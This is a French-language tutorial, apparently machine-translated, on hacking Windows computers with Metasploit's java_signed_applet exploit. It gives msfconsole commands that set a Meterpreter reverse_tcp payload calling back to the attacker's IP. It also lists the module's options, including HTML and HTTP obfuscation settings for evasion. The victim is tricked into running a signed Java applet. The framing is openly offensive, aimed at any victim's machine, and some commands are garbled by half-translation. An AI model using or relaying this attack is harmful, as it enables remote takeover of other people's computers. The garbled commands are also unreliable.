Comment pirater n'importe quel ordinateur Windows XP/Vista/7/8 utilisant Metasploit [REMOTE]
Je vais vous montrer comment pirater une machine Windows utilisant exploit de Metasploit.Si vous utilisez MS Windows, vous devez installer Metasploit, si vous utilisez BackTrack ou Kali Linux, il est deja installé [VICTIME devez avoir installé JAVA].
Cet exploit crée dynamiquement un fichier. Jar via le Msf :: Exploit :: Java mixin, puis il signe l'.L'applet signée en résulte est présenté à la victime via une page web avec une balise d'applet.JVM de la victime apparaît une boîte de dialogue demandant si ils ont confiance l'applet signée. Sur les anciennes versions de la boîte de dialogue affiche la valeur de CERTCN dans la ligne "Editeur". Newer affichage JVM "UNKNOWN" si la signature n'est pas fiable (c'est à dire qu'il n'est pas signé par une autorité de certification). L'option SigningCert vous permet de fournir un code de confiance signature cert, les valeurs qui remplaceront CERTCN. Si SigningCert n'est pas donné, un certificat auto-signé généré aléatoirement sera utilisé. De toute façon, une fois que l'utilisateur clique sur "run", l'applet s'exécute avec toutes les permissions de l'utilisateur.
Donc, nous allons commencer.
D'abord, lancez la console Metasploit en tapant msfconsole dans l'aérogare.
msf> utilisation exploit / multi / browser / java_signed_applet
msf exploit (java_signed_applet)> show payloads
msf exploit (java_signed_applet)> set PAYLOAD java / Meterpreter / reverse_tcp
msf exploit (java_signed_applet)> mettre LHOST [MON ADRESSE IP]
msf exploit (java_signed_applet)> exploiter
msf exploit (java_signed_applet)> show payloads
msf exploit (java_signed_applet)> set PAYLOAD java / Meterpreter / reverse_tcp
msf exploit (java_signed_applet)> mettre LHOST [MON ADRESSE IP]
msf exploit (java_signed_applet)> exploiter
LHOST est votre adresse IP, vous pouvez vérifier en tapant "ifconfig" dans le terminal.
Exploit Options du module
APPLETNAME | Le nom de la classe de l'applet principale. (Par défaut: SiteLoader) |
CERTCN | Le CN = valeur pour le certificat. Ne peut pas contenir ',' ou '/' (par défaut: SiteLoader) |
SRVHOST | L'hôte local à écouter. Ce doit être une adresse sur la machine locale ou 0.0.0.0 (par défaut: 0.0.0.0) |
SRVPORT | Le port local à écouter. (Par défaut: 8080) |
SSL | Négocier SSL pour les connexions entrantes |
Sslcert | Chemin d'un certificat SSL personnalisé (par défaut est généré aléatoirement) |
SSLVersion | Spécifiez la version de SSL qui doit être utilisé (accepté: SSL2, SSL3, TLS1) (par défaut: SSL3) |
SigningCert | Chemin d'un certificat de signature en PEM ou PKCS12 (. Pfx) Format |
SigningKey | Chemin vers une clé de signature au format PEM |
SigningKeyPass | Mot de passe pour la clé de signature (obligatoire si SigningCert est un. Pfx) |
URIPATH | L'URI à utiliser pour cet exploit (le défaut est aléatoire) |
ContextInformationFile | Le fichier d'informations qui contient des informations de contexte |
DisablePayloadHandler | Désactiver le code du gestionnaire de la charge utile sélectionnée |
EXE :: Personnalisé | Utilisez exe personnalisée au lieu de générer automatiquement un exe charge |
EXE :: FallBack | Utilisez le modèle par défaut dans le cas de celui spécifié est manquant |
EXE :: Injecter | Set de préserver la fonction EXE originale |
EXE :: OldMethod | Permet d'utiliser la méthode de génération de EXE de substitution. |
EXE :: Chemin | Le répertoire dans lequel rechercher le modèle exécutable |
EXE :: Template | Le nom du fichier de modèle exécutable. |
EnableContextEncoding | Utilisez contexte transitoire lors de l'encodage des charges utiles |
ListenerComm | Le canal de communication spécifique à utiliser pour ce service, |
VERBOSE | Activer les messages d'état détaillés |
ESPACE DE TRAVAIL | Spécifiez l'espace de travail pour ce module |
HTML :: base64 | Activer obscurcissement HTML via un embeded base64 objet HTML (IE pas pris en charge) (accepté: aucun, plaine, single_pad, double_pad, random_space_injection) |
HTML :: javascript :: échapper | Activer obscurcissement HTML via HTML s'échapper (nombre d'itérations) |
HTML :: unicode | Activer obfuscation HTTP via unicode (accepté: aucun, UTF-16LE, UTF-16BE, UTF-16BE-marqueur, UTF-32LE, UTF-32BE) |
HTTP :: chunked | Activer arrachement des réponses HTTP via "Transfer-Encoding: chunked" |
Compression HTTP :: | Activer la compression des réponses HTTP via le codage de contenu (accepté: aucun, gzip, deflate) |
HTTP :: header_folding | Activer le pliage des en-têtes HTTP |
HTTP :: junk_headers | Permettre l'insertion de hasard indésirables en-têtes HTTP |
HTTP :: nom_serveur | Configure l'en-tête du serveur de toutes les réponses sortantes |
TCP :: max_send_size | Maximum tcp taille de segment. (0 = désactiver) |
TCP :: send_delay | Les retards insérés avant chaque envoi. (0 = désactiver) |